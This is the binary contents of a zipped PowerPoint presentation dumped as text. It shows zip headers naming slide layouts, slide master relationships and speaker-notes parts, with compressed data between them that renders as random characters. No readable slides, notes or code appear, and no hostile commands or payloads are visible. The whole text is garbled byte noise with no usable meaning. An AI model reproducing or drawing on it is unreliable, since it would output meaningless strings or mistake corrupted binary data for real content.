...n.b...4.; .m.18>...[.\...X.....X..<3...].S......6\.W.x
0....LN......\<.l.A.+......E.4.]...3<rK,...0..<Ck.^..&....1N."....DJ.0.jB....    .`n1
............P...B...Y.x..FT>c..%....6..^.ljTK..
..........O..6.._...:..b+..]..(..o.......G.q..7..G..`....h...E..a8..._i......Q.....
.........~{sw...........kK.}...RsW.P'P...o.M.E<wC...-d.`bc............PK..........!.1...S.......!...ppt/slideLayouts/slideLayout5.xml.Y.n.F.}/. .gE$...KA..}ql#V>`M.L6.u......[...K23...-..#HQ..4y.pfv......*M.%.e.gc.|e....<.....~v..u..,.Y.g|..y......E1*........#+Gl.GR..~.."...U^....s.2    ...~(..p.I.2....8......|>...k.,R...D..I.....TlE..B..hh..Ir]...)..fO.....F`....>....$.2...i..L.e.....    ...-..}q'h...Nhq...@._?.a.o.0....TLl...tr.F.m5.a..........T7..n......o..}...`.R....h..K.3.e.5s.U.e0.:.>.Z....~.^p.Td.3...V...j\.....%...%W.y.F.../.d....r.....21i..(..wUh[...6..d#0.~`...y....{..TN.. O.P..4.....5..R{.J..&)
%.p.......Yx...#..1.l.o...?pY..x.......%,.Q..`...3...a..ZR.vd"0Z;K.v<HpZ..3pLs.&5..6l..A\p..................a.eA..Z<T....'[K........./.....P12.Z.Z.q.[6Z...l...`.....N..>+R..`..a..6Y.....Y..f..Vs....;..r;..U.:-Z....Si...u.Z....o...jZ.E...Z..Z.\5..."g.);.[..i.-Z...i........h..Xu......p(8$p.....b.R.i.I..-!#...Vm...J0.#..k..$..U
.^......2f...{.Wdl0tLH.Dt.1...D..T.:U.-.\*1i+.......U.....l.
.X..m,..V.....(V...2.(V.....(V...r.(V..[%...(.$...~...b.~T.........y.j    _..@...S^<.~...;{..wV..|!d..x....... ;.&/Z.9J.f...Y|..U.qU.....`...Z.(.T*w.8.v....J.X.fz.|.Zm..k5.....X...k5Wi..Z.J..em_.H'O..c.Z#e.zc.]....#=...xv..s..-..4.....^......4......P...4.4#D..q......Bu.l.7C    ....Y.....o.|.dxT.. .wM.P5...v?..=.n.l!.M..K....Vqr`..J..........w..\..D..w.grrp...."=........9|..o,]Mcpe.=.t...y~../....o\...4...z...Lbh..k.?.}1J*H8.+'.?....O.6.kx%.{~.P"W....?(..%.-+n.t...hp.........m ....M........PK..........!.ecV\........!...ppt/slideLayouts/slideLayout4.xml.X[n.8....{ .o./.Q!v1q..i..v..Jt.."5$..3......+.!%:...v...@~l.:<.=....'..9'+.t&.(h.h...X&........0 .P.P.......W.g......k..KC.!tDGAjL.5.:NYN..Y0.o..rj......7..y..j..9.DP.W....E..3./s&LI......iVh.V..V(.A.z..............pj..v0....'D....I&R...O..+.,H..P...R....J.,..U..Y}.`.U....N.k.D..B....A    ...X...E'...!q......e6N.k.M?.f...k]..=4....g.3..ZUB)....GM........b......HI%...p.G...kh..2.S.l......i....gN.L.F .....z5..w3xun&.Qx}%..Ox.$F..d....0E..K[...c.8.%...U......F....3.c)....z!+o"W..,.<.$:?&....@."...=..|C[+.........Z..j.g..w.....= ...^....u......2{MjW...W....F    [Xy..;.rPh{...N6....`.5..]....>..........z...}X..v.......a=.....%.j]..]..M.I.......A.....*#hwH..G....R$.......(;.~.f.pv..G.O.R.....eD....lQ..]........4.~.7.#.......m.6....{F]^........).EO.m[.=%..
..OloY...5._...Og..')..w..M.h.o..m....NQ....;u.[...........V_e=.-.,..j...c..
.._.~....Je.\R......T.........CqqIp..k.=`.._.].,o...O..A..6.g..F8....w:lL......`.:...TgT...    .f.....;.!......../.>.V...v;>l\ ...x.......7..\..../p..k*p.R.|.....f........PK..........!.8.0.!......!...ppt/slideLayouts/slideLayout3.xml.W.n.F.}/.X0..x.(...[N...1".....$..tw.H-
...........V
UH..E"..gv...!/^...VB..*'...u.(.*..........a..2..*..........E.k...M.4..........~_'.(.~Y....E.
np.......].....~...i..S.W.E...*Y..4....._gy.;....Z    ....HfS#Z-...O.f.
K.3E..\......"!.....Ou}.. .r........nWw..)....~..5..%.p....C..z.......[O.$mC...c.6,i...j..=b.d..X.;.8..).]7.=..........F..rl..............U.F1.|...zCP.].....k.iw.-....^`..Cw8v...E..b..5^0..h`.tHp.@..Y_U..(}.?2..$.P..v.Xj37..<.z%=..q..6.....b..K.......`..p0..l..;..CD..cP...HN.(...9..03)8.....L...f*&...7\.......3...>,.(.;.8.o....cx..]..........V.....<.Y%.... .-]....b.A.....9. ..;.P.6y].....u.Q.f.i.S
...<V..W7.A.2...%..ay.9.'.+.H..(.BSPd.K.j..
.....    x.h..@Z.`.7..(........wx^.ydv...uSu..PZ......Q.g..J.8......<..PZ.h.0
..sr.2..... .....@Bi..{..AtfR...8.<..U!..|....Z.....A
;Az.....L
...[.0.f....R....\..g+a4....Q..h2T>.r.    US..1D....nt..*.......M..6.....=...u.~..X;>......f_r....{......>'w........(.vl...e...w..lz]...2.g./.{.W....Q......0.Bt.f._N...e.Q...Q...m*t..7....~...?;..K.....6r...K.>.z#..^.]Ym.'..xf.j|.Q..tgB..G.._.......PK..........!...K]F.../...!...ppt/slideLayouts/slideLayout2.xml.V.n.1.}.........
.()}........n.....@.J...s.%..kP.*..R.............2.
*U*x/.....r"...z..tT..Hi.#....`IUp......E.x)....W!....yX.*....."....BfX...U#...;c..Z.U.p..._../.8%.L.yF.v .2.!~....h.>h..
`.....2.l....Y#Y.k=.C.d.".q...T3...4.\..5P.TRjLy.I..|,..e1.(..N..T....}.`.....G..".Y..C .-z....\.    .t..q.d.J....$........~
......9..8:....)..sA.....4....e..L..>O.c^.fK;......pj...."Z..o.n.q....%...........aS..Wn&P...2...K.t.Rr..@4J5..JS.l0.....v4lN    Iy4.._o ..p...}...(.=.OdYMh.0..`..q.2Z....3.
... V..u/d...%X=a..h.....M..M.P".G.-(...2}..4I.........\.d.......NtP.W.....kJ.<..n.PAO....
..a..t ..O(....W.F)7.#..._...,.@tM..&.2b.....
..uM.:<..;..:..nmq...t..>t.[...jd..........?/.Ll..c...K.GO.3......&.......r......?P.1.?f..V.t.G..q.Q..+..f.28i.+..h.89k......<..K#.!5S.....Ch"{........~...~i..o...n..G3..q...._....1..xh.r.L].......n.........PK..........!..M.'....G..!...ppt/slideLayouts/slideLayout1.xml...r.:....9..1.!...z.0m)...!..T[I<.......a.....I......z<=0.$...Y.......m...IU5b...|.0Q4e%.S....Q....()o..z;.............5kM.!TN..J.6..U.b5U...    x.hdM5...q)..`.|..~2.i%<7^>d|.XT.{....    m!.q.a.jU........)......w-.VW.3..0....7...s^.Ak.q..d....G....a........f...B..D.......f~
........D..B..C...d;....~. ...&..Y.w...=...tO..{.....`ukWt9a..+Dp.*.Ja.YS.WD4.N\.]^q..`.f..+bU/.44.j..I.!.....Z.$.3.*...?
....i.F....Q..6...-.....)w...|.Wh.....gFm...0s..o9..ab.n..S...(d.sF.NxU.'.!..4yM.f.h.{.".a...wH&..*..;d....f...!\Z....si.......(...F...m.y.p..I.$..I.%P.n;..].R.X...mE..`.o.O..^..&...l.RSyf2..%d...|    n...,......q.d.0.....+.YQ..... R.p.....l..@.8`.....@D.#.7.Y..k.....IO.....&#b.1.AL..Pc...YOD.Pg....7.I.....#bLE.
.....Ab....u..-+..X.i...6.qr..hv$e.a.h........P.........)[....k.........L`..~...g....[A.....qk~|_Xs.B....{N.....t.e.^S    g['..........7..w-....z... ....7..Zb.o...i...?..N.Q..... >.....Q...<...VOa.,`i.(w.(s.B..o=.................1.l.t..n...\..........6.........E...............PK..........!.p..Ku.......!...ppt/slideLayouts/slideLayout7.xml.U.N.0....w.............D..L.4....nh7M.....Ivl'.V&.Ih.nZ...>......U%H..)k9..V....:+.bB...{....d.D-........o.*1";a.zi    bH..    -.UI.....3[.....ZW.b..Q..-bW"...GQ.JI[...:.......... ..fqS..t..K.)..x._.d.
l...7.x.n`........d..3.pF..5.n%..Z.......\.2s......-.o%`XD../.H,Y....Y.    .jB......K...4..GkZ.=.M..........P.*0.......)
d!8.<0.p...:.1D...$........m.Yf.90OO...'.;Y.$.".(./H*.9.. .{.^1.....x.Y"d...*..Y...d.....d......u#..7..EH..3tz
.<P_f.L3.    ....e.j.I.....;.. ......v....V.e?/.... n.....E.....W..3.tY=..v[..Z.........`..wz.....`o..;.a...v......h....hD.q    j...f.............~..:......wm..'.Y,....T.OL.5..,...">.&....,....{..?.......PK..........!....}....[...!...ppt/slideLayouts/slideLayout8.xml.X.r.F...L.a.^+. .f,e.%...x"....24+..J...L^.}.<I.....b#;..72Fg....>q.r5.d.D....q_.....L..v.|...D..%-R....5.....:.....t].$.GQ.t.dRVq.['....EY....J1.....n*.......zawN..i..6...,O..2Y.Y!.`.J._gyU[..[%X.}z.$...my..t...K.p..<O&<%.....,$..].32...Cc.j*.S.b...&...G.......j(.n.E.......{p..2.x5...9.....:H.Z}....J...L.w....l..9.......C...xt....3.%g..xe..G/..SM..~*..{....)..}...~.....R...k.Sk.&..`......~/8....E..;DE.uC.A.zl..X.^..ZE...8Z$Y.B.1q....5G.i....A..[t.G..8e...U.:0    6.X.7x...;<.0...|.(...Y..8A#...3
..'9..<.DdIX.K....    .....e.].ghJV..TPe...J...d....K..o..A...kN...<....* OQ..H.'....J.j.c..\...d?...E)..MCi.M..H.....MU...L........^S..U..b-.X.......`.G...66X...cX..6|.k.....Z...cX....1....!.$`.4.3{Ji.n.z..L.....}.....x...H    gK.[...:.~...=.n............*.S...Qv....f}.fS..]).......I.LM.H8FAF.........CMI.....W..n=4........#o...3..>[....K.b.E.mG]*.n.WX
u6w4...)5.........3......hd.w...SI+.=m<......n.......|..).oe.....7|.......h......:...]o..Y....{.../..O..c>...6.....~{.
..}`    ~{.b......a..g@..!......nP..R?(.z.Y.SyO.\.=X.Qa..Z0.Pm.l..m..#........~`.5.~P`gR.......y#.n.........?0.x.p....o.....w........ .{..q'.....C.M'..............O...[..C...-../5.f..+G_...../oWF<R.;.mt#.W..To8t[p..V..z.....x.oUx.c.?.B..})4........PK..........!..../........!...ppt/slideLayouts/slideLayout9.xml.X...F.}OU.aJy. ...Zp.........0+H..%....R..J>._....!.l..S...C......\..&.l.(.,.....AX.da.........A
I...,ecc.
......s.....ekI.#-|:6")s../..%.x..,....H...b...}........'4N.J_.....8`wY.NX*K..8.p."..B..m.r.
.Q..#.]...q...D..,...,..<$)M`a..r-.y.eD.4.s(."_..P:..&.y>.J.q3.$....0.........<...W.....H&...................bP......AtB..7...7....E/...9.XrF..U.(...,.T.4.;.....q...f..#R._"T%W.......S}..'L...F..`.=.,..y..G...}...7..M4.lRB....f..]....9..Q............8....p"B.
J.C.P?d...T.16 .a.'m.^......S......)V"K{..P...rF..2IN.<.>.........d.(.A....].=.$K.....u....>...k...0...>.A.e0.4`Q.C8....b.....P......N.n.....9e.tu4..6ML...p6.    .....4.j.G......Si............G........H.<.......5..i..o...en...Txv.g.=.K........R.:..#..n..R..5 .....    ......=[E....R..j@Dk........:.t..cP..4'!<...|.p    0.Ld.RUA...:.1wu..[...K..k..T..5H.........v........x.<.....'..3..R...+7xg4.nTn.......j:....Q......H;f......H;f#./@;W.f....H..w..i.].r.x.`..^{.Qi.}(B.P3Q....0........h....m
.f.F .n...#F...k.s.R.V.. ....d.}T.+.:&&.b..DUOvz.=.&X.......T.t.R.......jj.:.wv.R........Y..-....s...u`.....:9...].?...^..e....m...oz.{..l.....L.....n._:...eT....a....P..H...@.-'_>.........[....F.ry...x..F......Fq#\.@.O.R..,X. Z. ............PK..........!..0w.....I.......ppt/notesSlides/notesSlide1.xml.U.n.0....w.|OCS.%"T..4.....x.!Q....N{...    ..V...8..;.t..%G..M!E.oo..1AeV.U._...=F......K..........!-3...IH.skU.E...$.F*&..R..Xx..(....<...VT.B.}..&_...e#I.%.6........P......43P.g....lt.3.4j..s+....\M..<.L5*2`.#AJ .G...0.* ........I.K]..$.lh.b..~!.$lk....K....4...U`.CS.* :.....UA.1
..8C....B......        x.r.C4.k-.rF2...z:.T..%.....) ..l...e.)..&.2..Z...g..ObU.x!.xp\p...=...@f;G.wxz.H.....g.X.O.%...?;...]o.k..~..h5G..}#.uZ.~;.;.......-2&`^WB.    8`N1...yP&.Ml....[..7...lJ4...A.L....a.d..X.s.b7.X....X3iOe3
.>.:Q..^.#...G...M.....Z.>...P+.w%n....;...*..gR...++O_.J..    ......L..y....%q'....Z.....e7!S.!g..s...Z..p.....(...z..!%    \.p..~KA.....H...........PK..........!.s..j........"...ppt/slideLayouts/slideLayout13.xml.X]n.8.~_.w .g...e!v.q.}i..v..JT..".$...X.....'....M.v.4-P /.%?...3...MC...Ys6..g....yQ....vy6H=$.f......%.{>{..I.IZ..[.R.0......j..P..i.|.[..].E.....a!.5`7t...h...y.x.g</.:'/x.j.S.D..../........
"........0[u./....~....k....7....-..<X....4...9S..8.CK.Q.X.KA.....v.^
.q.....4f.......e`...._9$.mJ..Np......@n......@.}.........zy.z.>...>
9.....N..c.    v............y......k......
u..,wv.....K..st.D..!....8.E.MN.0...{.L....7.......m.6...jF.......T....0|.......b-#..o. .F.). ..*j6.u..).HQ+..K.).L.I..P...IXq..~s..:._.O...iM..#.......8'...8.j
.]4....k.......AvC....+n..H..P..9..t..0H.IjB.....BtMw...@jOM...@..&M..}..tD.,H.a..dMh.x..#..U-..G64..:.+.........AtX    .TB..$d8yH    ....O.....-}.8uk.........zm:.I.J..t...[..../ .3.B...Q.i..##....o".I.&...;..]...q2N...X.....b............
6$=......k....."...fm...m..f.Pwd.......P.iU.l.u..X.5..).....=....\....a.....F..^..Ml..g>.@...Ar.|.n..Y;...."..-.W.A~{.W?...N........i."...y..Q..N}<H'.drz..A...u{cI..0....'.    ....j....O?...5.'....1B....W....Q....k...A.....Q.G?V...Dc............PK..........!.J.......E..."...ppt/slideLayouts/slideLayout12.xml.W.n.0..G...p.5i....".n...{./q..c..--.i....'...[.+(..    ...q....>>.G..%E."d.....|.....`.C.z..5..T...rF...H......*.4=.+>W.|0....+U...LrRby.+..[.E.....v*.'.].v..{.......&.y..    9...$LY'.P. ~...t..&.*A$.1..CR.
.U..........X.`.. .dJS.p    ..BQ..#4#K.8LA...x6...    B.$.x'.iu).....@E.=...v..63....O{g.....e&........z..J?a..uD..L6.I~..6.O.X.....zQ....=L.........)...<. ....N..../.3..v_..fBc\.....g/...5.........w{.`..A.s...52A.}x..8G...\.j9..J#z.....S..jE.A...1D...b. .Z.SPP.&.`PX...Mh.|@.#..
.a.`.(...v..P&.......|.....+C..B.......k.....8!9.)D.....vT<.,..$..$.i.....X~.{....4@.-.E_'.D..C.o......]...t.H.r.N..l..pK......$.p.P. ..{..#...B4..Zj..........}..".....?*...R}.oi.`.t-....g.=}4.?.O..0.DV......~..4....O......(r.."    t...G...Z5.8Lr.&o...r.S../......."U......x..(..h.....JHPw$)..h[U..Aa.u..........X..g.6S.".q..t2..7(.. ........L..E.|^...AQ.+.fp..7./..F.$.Z.`.ou..'...$j.~.L......}...^."%.R..4......V...o....o..XR[<^6F..F..=.0G.........+l......j..lL..w..........PK..........!.........F..."...ppt/slideLayouts/slideLayout11.xml.V.r.8..gf.A......m=M.4....!a...\{.%#)!aggx-x...#.Ni. eaf....#}.|..N..kNVL.J.q.>....L...........hCEN..l.l...L.xt......F....)...1M....d5..e....R...U..sE.....h0H.5.D..W...EQe.\f..    .A...`......5..5.i...w.d6..1fQ..."_.....
.`.
.9...5>...*...x.........B1f...3...k.F_....r......G..^......~.!.t].zrJS.C..."n...h.E...n.f..=.Y.tOt...+.N
.....t....R.mz~...s...DH$ly.yfW...&o.iJ.51V..HUA9/Q;..:....Q..KP.D'...):.%...\E........q.G...C.$..I..L......CP[4..Q........3..X.)R.....Fc..j.F...3.Fl.3......H....K.S.Q....).1.......*.r...JS..uw.u)Xf.........9.X)y..D6C4B'..Ij..Q.m.....peG......>a.Axrl..*aQo...V..(.........t...M..z@m.Y&aS...?..I...EY.....U...B..).^....U...~.S[l...K.a......~.......l..|[2...f..../v.37p.w..)/.....8....a.>....5.s.....6.@.Zo.
..w..g.........}b..."b..<.o.T..;r.p.....>...7...Z.4...^~.).....A......O.....7:K.q....E......i.....,.y.3.....\S....L>.......o..S.a.o.....)....m.\]....90N.(......n....!..;.O>.......PK..........!.4e..^...f..."...ppt/slideLayouts/slideLayout10.xml.V.N.1.}.....i...+..B..7..ww.....[.Y.V....s....1....
R...xg.g...{.`VrR3..).Q..VD.HdZ..~t59n."..).R.~4g::..}._...'t....C......*n6u......b..2.Jj.W]7SEo.].f{kk.Y.BD......"aG2..L..........t@..A....q..C2.
...3.E....+.h...1O..%.&.... .    .EB9...qf..(....?.j\](.}V_(R..m..5...f....^.O.....g.*..4.+d..P..}.....$~1Y.&..
.$.....6@........y:...'....7.p=...&B"O..O/9......W9.%0...........:...P.s..g..E.sm.f..#.a...x.~Nm.3.....K3..b........1...0..j..q.`....v....d"...^>A....;#..!^=..'...|.S............Z.""U.!..../.4.2.0ne.(...mt..G......Y......Q=<..x<....Z`......f|xW..'y..G.xF...XN......)|..D....$t.$\....5...
...BV 0...l.....M.......>Q..@.....<...$...5~.>....t;../..J1r.5o9[..,.jx..d.e4p..k...e..~N....W"63.3.eJ..4.....O..yN..+......\.....y3\.....^{.9..v..no...n......h.u..k...{.......H.@j.........._3........R...u.|l. ...^.]...W..:....v.&...
.Y;.0].X.p?.........PK..........!.Eg.......... ...ppt/notesSlides/notesSlide20.xml.U.n.1.}....N.,    IWY"J.*RKPH>.xg/..vm..V....,..B*....z..1...Z.....L..Q...\e.,R.p.;..:&3&.........w.:...%./m.RZ:..(.....#.A.-W.f.."....yk....0.Y%.&..%^.y..J.e..I....w[V.v..[.i......Z.!6>.........l>.=.3...ffH.!c.HV#14..6n..D7<D{.E..%...... 6.J).......X9..K.x...g|y.....+..l.zT-..p...\T.....@f.q(.....-.6.a./..D*D.......&%.......Z6...j{.|7.$n..H+....e.m...].EZc..e0...4L....0....T..8.(Q...~u.V.1....=..;d.....r...IX7wk.x....%!...    .4. {.sJ...0...n"...o.........#..R(&..Q*_...m..~?..Y...z..W.......AF.P..Rf...g...."..-~..4vT....'....N....tW.......S.[.3....80.....>..T.\d.U.u......a.t8.{'...w~2.{..u|z~..j.......]....*>..v..q.(..../...8A....c.pra.2}.......k..4........=...?.......PK..........!....Xc....... ...ppt/notesSlides/notesSlide14.xml.T[o.0.~...`..&.KYD.....FQi..8$.o..N..;v...........9>....h.....p.,..I..Jn2|{...0....p%Y.......7c.J..E./mJ2\:..(..d..3...[.. .>.&...y...8.F.T.7..5..(*...n...Nb.'.z.e.m.M.&.6.B...KK..F.<..V....$w..^..    ..neP..c.I"...5..-|Jp.!z..i3.t_.1.....}...... ...C.V..--.^.........tp,.Q....IZ8k^..]
.ah.    e..93.{.Y..H.I./.I..kB..r.4+.......U..]...."....;h ...Rl|.@.....0..X..=.^.f.6.1..4.......a.`D..?..S...~.>.."....n.**..=6q......I
..}....r.....3..].....ok.x..~.N=..V..|.....$.8!5........i9.k....6.SS.<<...I/........t..y...gI'.-..h.n>.{?.q.`.%t..5OhEV..g..b....#..t.~V.L.J..p.....b{q(7.......C
|..J..lv......{........PK..........!............. ...ppt/notesSlides/notesSlide22.xml.U.n.1.}....N.,...,.........p....k.........!7../..}f..9.{z...Y....)=<.R.....EJo..;'.X.d.....5Xz6...T'R9....&,..s:.".K..=P.$.......).......Q.....U.n..=x.........k....a....m...D..,.    .......E....6.~%._....    .....*C.(..Fah.9.\....."z./.H,Y........UJQ...E.K`..o6.v.../.....nGm...!.g.0zN'n..E....Y.d&..R...9|.........%R!.F.u..f5..,`d5.......6...W.K....."....&..O...X.As..x.L.%3N}L#.Oc..*[St..(..f.:q......@.....z.p*.....HX7wk....l.K.....j.R...9%Ye\p.....`8...........RYR(.....D....n... ..3...Iv..P...JV...8&...U.G\    .k.S'.....    ..v.U...|.o}..~..o.......vAcch|.........uO.._.'...Ir........=...:G.^...&q..?.;..y|tr.i2..~....q.X]....?3V3..Dq.$L.........5/Z\..^..w./..U.IA..aK.G.G...+^=?..?.......PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout2.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout1.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.....'.......,...ppt/slideMasters/_rels/slideMaster1.xml.rels..Kj.0...}.w0..e9..9.R.tU...{...d$......u L7...$..O?....5..':.Y.@..$hJ[u.Q.~~y.B..6...A..z8....7.u.....}.....a.......S;..oj.....5b...nP.Y..n^......R.NU............my...;-...
_.d/!..... M..~.......L.8irA.Xi.l.....L..4.S6V.)...Q..9ekJ&yC..m......8..F..(.....d;N....-.+.........>.xqsm)........PK..........!.....c....... ...ppt/notesSlides/notesSlide37.xml.T[o.0.~...`..&...P.0.J.E....c.h..6.:....!..........9>....h.......Y...T..,3|w;..1....p%Y.w.....7#.J..E./mJ2\9..(..b..3....J.A.|.2*...y...8.D......k..jUS6Ut-.tM..8q...jm.l.5..a...._Z..6.......0.%..h.R/L0.7......H....ho...O    n DO..6.I.+#.#..6..0.....DR.u.6J...........w.....E=...s8I.g....+AJ...PV)^0...8.`..>).."..yC..Qn/...%.X.hP5l.....)...
..."-/.D.....5.m...4.....t[0....0..0Nwz....-...Z...N..=....@....2b.vjU;_....[..g.')...A..b....V3.d.n..
.P....)vz-;...kq..=&..?H.qBj8"....&.1.r.../I.l<.f....._$..._.:.A7.....3..I'.gI8{7......j.......'."+\...........{........6.0.....^...g..7a=..._yPi8...|t.............PK..........!.Sq..c....... ...ppt/notesSlides/notesSlide36.xml.T.n.0....w.|O.&@iD.....FQi..u.....M{..;.......89..w...j+8.0ck%s|~.c.$UE-W9...u..YGdA..,.;f........r."..6#9...Y.YZ1A...L..TF...f...|...GI..#Aj....5..,k.......Ib.'.z.U.m.M.&.6.B...KK#.F....V....$7..^..    ..faP].c.I"....{..)...I...D.mi.hH2...9..w...H....FI....y..V._........G. z.'i.,y]0t-....'.U.......&.@...~.H*@...n..K.....[.hP5l.....)...
..."-/....    .yk....3h....I[0....0..0Nw.....-...Z...........@....2b.v....wl..-..3...... ..1..V...9f.s..L........;...f...x........`.......Y...i9.k....6.SS."<...I..&..N..&.n.t..I..'..7.]N.q...V.\Bw.]..Vd..pF.,..c.x$s.......A..N.Qs^@l/.....7...pH..IPi8...|t.............PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout3.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout4.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout5.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout9.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout8.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout7.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.........7...,...ppt/slideLayouts/_rels/slideLayout6.xml.rels...
.0.D.....n.z...^D..E...d...$d....c....0ov..k......5...A...|..v=.. 8..8.O....o...B#....E...Y..s.).f.    Y.H.8]H.."S.".;...U.Qi....)NVC:.....K.v.:g...c".T(...3r.T..z.....y.jY...6.kn........PK..........!.N...c....... ...ppt/notesSlides/notesSlide35.xml.T.n.0....w.|O.&@YD.....FQi..uL....N{..;.......89..w...r+8.0ck%s|~.c.$UE-.....:...#. \I.....r...PgR9f..K...W..,.,.. .Li&..RF.....
C.A^..$... ...x..x.Z..M.].&]..0N..n.Z.6.~M6m..4!...F...y....5.yIn>.............0.D.18...n.S........D......d.ms..../...m....>jiu../.>.......CQ..A..N..Y..`.J....'.U.......&.@.O.~.H*@...n..K......f4..6.|.....nt..N....W..e.m...6....c...`...<l.1..4.....b.a.`D..?..3.}..~.>.."......Z...;6q..n...I...}....r......3..[.....ok.x..n.N3..Z..|.IJ..I0NHG.!._..8fZ....%i.....x.....$.{..~..O.N.?M:..$...Y....M.q...V.\Bw.]..Vd..pF.,..c.x$s.t.g......'..9/ ...r....MX.8...$.4...N>.x..r.~.......PK..........!.F.4?....6... ...ppt/notesSlides/notesSlide21.xml.T.N.1.}.....6l .+6..R!.....cO...V.I...{..,.@.J}If=.s...'+%........^.....Z.Kz{s..P....I...k..d....-.    .    .k_..V!.".<.@1.g,h...S,...g...XW.,.v..b...|..|3....._(..).@........f.S.:.X&e.5............-.....N\r...Gj..Q..Bbh.ql....04.'....+V3....@ldUR..1...
.7.|{....by.....m..<4...D...-........@&.q........&.a.o..D.D..b.M.X...9.z.<.5l.....)......E"...j..$..7.m.G.g.c7.^.f.6.1..m.oOzg.....D..W..EX}..(lL....!.N......=vI..a-..Y..."e8\<....t.vJ..]H.A.
#    ...f....8 ....'.&.....[H|T...!uN.A.    s.zg.fJ......|K..V.f...u...X...P.w.K..u_......V.D.?*....L.t.........9....A.,...Fy.;:......N....a..o..%)...L.f..8yo+....;dzE..Q....>o\.Kf..I{|...Q:..!...nC"{.&........PK..........!.`e2.....p... ...ppt/notesSlides/notesSlide30.xml.T.N.1.}.....6l .+6..R!.!"...;...[m'$T....l..Z./.....9gf.OVR.%X.hU....%....5/...yg@..LULh.%]..'....M...G0^.......Y.x..=m@..L[.<~.yVYv..Rdy...$k..........p..B..    ..`.swuc\.f..f,8....4Dn|*.......+..j..Ll<./'.4.*F.b.....`s-~*...l'|.".b5.rx.
.FV%E.....X.+Ox......|....<s;k......V..S:yKg*.
..ds ..8.ZT`...g
f..M...(... .J..jT35.Sg....../...D!.S..6(......g.l.4.......D.e2...8V.c...4...VWk.U..EY^...~.....!0.b.CV....5>...H8?.k...
4..1.b.    ....:7SJ...X..I?....7....Z..X...@..E.e.D.:.K.UHb....v`AU.f.....+.C"(S+...2..51U.x!o...{...^b.!4.....\0....F1...h.S.g..S..Q........~/.......`.w....pp......M.....0.g.{.z...y/0    .../...9..4.q..F..wf....p..^..ep..4..p%..zp........PK..........!... .7....... ...ppt/notesSlides/notesSlide25.xml.Wmo.6..>`....U........Y..mb......E."U.r....;RVb+.....}.%.w...W].[...h..j..=.F...T..0...&...:.R&..a.B......e9P....Wv..Q.\9.t,..`.D..h/..`.^.....@z..I..~.`BEkys...2..Z..@.j%.%sd..Ei.m.!.J.....-.F..Oe..m.. .'.....rb...bb@..X...DL.Yo...WE......7..`..bt......._._.b.\:.."Z....gy....;..d....U..9...3."Ex_.9.D2...).x....f....YP.....{..O...9^..yX......nO......J"...}1.....nxh.,....a...k...H......uKg:]E....@.^{..[.N...^..b.C........mnI..n%.......A.P.I.t...?O#H.q!:..n,.Q.....&..s. ^..W.j......(..s
......3,..P.....b.*.@X].%.tE....'-.P..f..^.Z..C`"..R.O.;(...Z...^Y..7.)../d..xn..b
.s...V.h....;......a..h.>S.k1..j.....Th...qR]).C...7....A...d.RS!.F..g..:.Y'?.....Uy7=......P$.<..._...!3..V.\.......uFp....+g).[..J......-U/..a.|@.U....*.$b.(.3.d.Ka...f.HR03....=Y..F.....QJ...s:..4z..n..-nvU...l..&
.3..Q.\..T..J...(^/..1.|s...uo.z=.|.F.4th..u#.Q.Mk*....[..    Z.....4!.P..4.&.~...c....R..).....p..B..BB...Y.q...#j.4c5s.=.6..6.`=.R .(.6...1.A.YI5.....K..C...a....0L|.........'........{I|..N...q.w.7....o.W..?..8M.H.u/.|.J..9\.F.....j/..M{..|TB.c.U......E(...H|..RIE.k..OG<{~..........PK..........!.B.Z`....;
.. ...ppt/notesSlides/notesSlide26.xml.V.n.6....w t..s..N.    ...Y...k.....m..H...{C.>..r}.}.,'N...z.\8.y..s......Z...NhU$G/.    ...R.E........<U%.Z.".p.............+.."..7y.:V.....p....5........vk.f..IZS......}=.../4[.\.....z..*a\k.|.5c..........T...3....R............Q"c    Q.Fb.t{....
